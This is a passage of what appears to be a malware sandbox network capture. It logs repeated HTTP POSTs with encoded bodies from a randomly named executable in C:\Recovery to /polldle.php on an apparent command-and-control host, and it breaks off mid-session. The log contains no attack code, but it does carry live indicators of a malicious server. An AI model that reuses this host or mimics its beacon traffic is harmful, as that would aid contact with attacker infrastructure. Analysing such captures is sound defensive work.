                                                                                Data Ascii: ]^TP_BZ]T]UZP_Y^PPZ^W\PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9#1&$[&2)0/1 -;4</01R,'<]52#*%#X'/\/(
                                                                                Jan 11, 2025 23:33:46.904376030 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:47.080843925 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgunCBlXjj%2FzD%2BtazG1Ec66Mru3Qqz961iGIYrPSFNz8YRzJJcaZN%2FSqXqDo3yEJ6Vd4C8mhnaKq8nUg9AebUV4MqgAtG5EwNssrx8Fkv3zRdmdz3GMBgZdCMewW2uyanXO9MrYq"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ed3ed1d42d0-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8140&min_rtt=1742&rtt_var=13449&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=27584&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                66192.168.2.450069104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:47.211997986 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:47.567406893 CET2504OUTData Raw: 5d 5b 54 57 5a 49 5f 5b 54 5d 55 5a 50 55 59 58 50 52 5a 58 57 52 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TWZI_[T]UZPUYXPRZXWRP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- 128&=]'9T#,1,]$?'T$#6S.$'52+<#X'/\/
                                                                                Jan 11, 2025 23:33:47.678834915 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:47.898166895 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:47.916119099 CET801INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Siry10fm5vaG9MpwbKh72MW0tg1U3NNxwo8JEb4TYaWuQuliXYgZ9k7nYUpRSPttTF1hw%2FZsggiWOoO4kLB4LepsCvuoVI2M3GhwH75UDYa1poUgyc6IFSNytraIAT9ztL4NJpor"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ed8b9d2c448-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2857&min_rtt=1453&rtt_var=3354&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=115060&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                67192.168.2.450072104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:48.434010029 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:48.786113024 CET2504OUTData Raw: 58 58 54 55 5a 47 5f 5c 54 5d 55 5a 50 5d 59 50 50 51 5a 5d 57 51 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXTUZG_\T]UZP]YPPQZ]WQP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@-!28&"9'T4!,+?1 6.7$\#2$(5#X'/\/
                                                                                Jan 11, 2025 23:33:48.877964020 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:49.124397993 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:49 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDERql6EmR994RCKSLx2aTzr5gVK%2F9z74G3mhSzRayzuy935Mc0spxnM5r0F9MscHdiYAf2cQi6mvmDqmBxC6y5qJoGgZ5WE0cXtDJ%2FNr93rt6W2O738yeSvsvNOu85yJXFh0d%2B%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ee03b85439c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1782&rtt_var=1083&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=424048&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                68192.168.2.450076104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:49.286494017 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                69192.168.2.450077104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:49.620321035 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:49.973669052 CET1620OUTData Raw: 58 5b 51 54 5a 43 5a 5c 54 5d 55 5a 50 58 59 5d 50 51 5a 5f 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[QTZCZ\T]UZPXY]PQZ_WTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B,0&C2/&1\3?9R#<9Z,7^(/3&U5-$("T<(#X'/\/4
                                                                                Jan 11, 2025 23:33:50.073339939 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:50.233906984 CET948INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EhYwNMaGmP33gCIcaOqJ6bos72qrR%2BXHm497VeycGgDriy8A%2FaU3YRXRng6J2GKRZGG9vwrQydIV2kqyujC9GtDgMn6x33hQJSPvPFF2OLa%2FKgqbSJbncoMSSBPhe2Aa86W8gW4l"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ee7bd03ef9d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4755&min_rtt=1891&rtt_var=6438&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=58851&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0b 27 27 20 5d 3e 00 28 06 3a 38 2c 04 39 31 02 1d 29 08 32 16 34 5f 24 5c 26 54 24 1a 3c 39 22 1b 28 03 27 54 22 2e 2a 1c 26 39 23 46 0c 1d 22 12 3f 2f 0a 1a 25 12 30 12 3f 0d 3e 10 25 1c 3b 1a 2a 37 2c 09 3f 3a 32 05 22 5a 26 51 3f 0b 2a 0f 3d 26 2a 5a 2c 08 3f 5d 25 2a 2e 51 0f 16 21 55 35 31 2c 1b 34 13 19 5f 26 0e 2c 02 2b 27 3b 01 25 04 09 0f 3f 30 26 5a 28 32 05 0c 24 03 27 12 27 3c 25 03 3c 5f 3f 15 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a
                                                                                Data Ascii: 98-'' ]>(:8,91)24_$\&T$<9"('T".*&9#F"?/%0?>%;*7,?:2"Z&Q?*=&*Z,?]%*.Q!U51,4_&,+';%?0&Z(2$''<%<_??;$\#(V?[M
                                                                                Jan 11, 2025 23:33:50.322302103 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                70192.168.2.450078104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:49.748934031 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:50.098912954 CET2504OUTData Raw: 58 5a 54 53 5a 46 5a 5f 54 5d 55 5a 50 5a 59 50 50 51 5a 5e 57 57 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTSZFZ_T]UZPZYPPQZ^WWP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G,06@&Z1*'9V"?%/]#Z?<3S& *U-' _523Z+#X'/\/<
                                                                                Jan 11, 2025 23:33:50.192986965 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:50.456264019 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfuaJVv6zcbiSToY84EETZ8voA5bJIeficUDpIxBUJjvQu2AD5nLKVtA%2BIYcopoHRC%2FS%2B%2F7JsvUKZkg4VE2c%2BraMevLMSLk30FNCwPMV6HwgrtmuWiIrdJmjOxFrEiXag%2BIUMWHZ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ee878b1432b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3096&min_rtt=1743&rtt_var=3360&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=116149&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:50.546978951 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                71192.168.2.450079104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:50.682909012 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:51.036226034 CET2504OUTData Raw: 58 5f 54 5e 5f 44 5f 5c 54 5d 55 5a 50 54 59 58 50 56 5a 5a 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_T^_D_\T]UZPTYXPVZZWPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#. 5%(?$!%X%/-4/(?1),4!,(5#X'/\/
                                                                                Jan 11, 2025 23:33:51.126868010 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:51.410923958 CET803INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:51 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AzxmocjZYyb0BEZgEEH4Za9%2FBBLB2AutO3qfzBn2ZpQRJs72Rs20ODy%2BdeYWLRSUgNid7tfHUqjgqm5TmECGGroFgeNKIb6ptOAaEaOIlYPEcgLjIPf7gTb3mfwzQFYVQ0JBItmm"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eee4e4043b6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1757&rtt_var=1019&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=456392&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                72192.168.2.450080104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:51.546957016 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:51.895509005 CET2504OUTData Raw: 58 5c 51 52 5a 48 5a 50 54 5d 55 5a 50 5a 59 59 50 51 5a 5b 57 57 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\QRZHZPT]UZPZYYPQZ[WWP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@:5&^0Z$1:0,1#?)8'<$3.48"'](#X'/\/<
                                                                                Jan 11, 2025 23:33:52.011527061 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:52.249825954 CET814INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNyvwjQyM%2Bp99r%2BE92d3fn240muFpjJTojNJq8AB9mQPyZy3pguvNnxqsng9yu%2BvoRgHAUd4g866wDc3mou%2FsL%2BEX%2B%2FLJ6hemoETdIXkLPNqzz18gYrLxU7LCM3Bh7qj%2FvYugHbG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ef3ca7e42d4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4743&min_rtt=1683&rtt_var=6751&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=55803&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                73192.168.2.450081104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:52.390055895 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:52.739322901 CET2504OUTData Raw: 5d 59 51 54 5a 45 5a 5b 54 5d 55 5a 50 54 59 5e 50 5d 5a 58 57 5d 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YQTZEZ[T]UZPTY^P]ZXW]PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .0:1(2)X0-T7?),?_+<<%V:85+]+%#X'/\/
                                                                                Jan 11, 2025 23:33:52.846191883 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:53.093205929 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5rsi0u8HmIwqmB0XaHzrEI3BA%2FQQ6lMSchIAUzJD6%2F0mXCQBeuZwGvd9OsRGRvOf4DCJyOoigNIaZywqDidDpoV%2Ff5Cr6IADJwaheJbWZ0uG9gVuGlC7VrrzECqPh9KRTv5RoYCn"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ef909570c7a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3624&min_rtt=1664&rtt_var=4544&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=84164&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                74192.168.2.450082104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:53.224828005 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:53.583025932 CET2504OUTData Raw: 5d 5e 51 54 5a 49 5a 5c 54 5d 55 5a 50 55 59 5b 50 56 5a 52 57 51 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QTZIZ\T]UZPUY[PVZRWQP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@-#%%;8[%"%Y3? ?6/;+_+3V%U:.B<\"! <#X'/\/
                                                                                Jan 11, 2025 23:33:53.690061092 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:53.926211119 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cqi3IrjMF2sjOHP1mqgDRhWGzifjx2naGskgo9WaeRqicSB8b%2Fq7rNBRQzHWCR%2FA5HLNulWGBojLOTEP4x5utPwPAjixYMFG6pnzydXSp2urFzg4zM%2Bo3RLAjctJgA2cebh0DAlG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085efe48ed4315-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4381&min_rtt=2056&rtt_var=5421&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=70674&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                75192.168.2.450083104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:54.060024977 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:54.411317110 CET2504OUTData Raw: 58 59 54 5f 5f 44 5a 5e 54 5d 55 5a 50 5e 59 50 50 5d 5a 5e 57 53 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
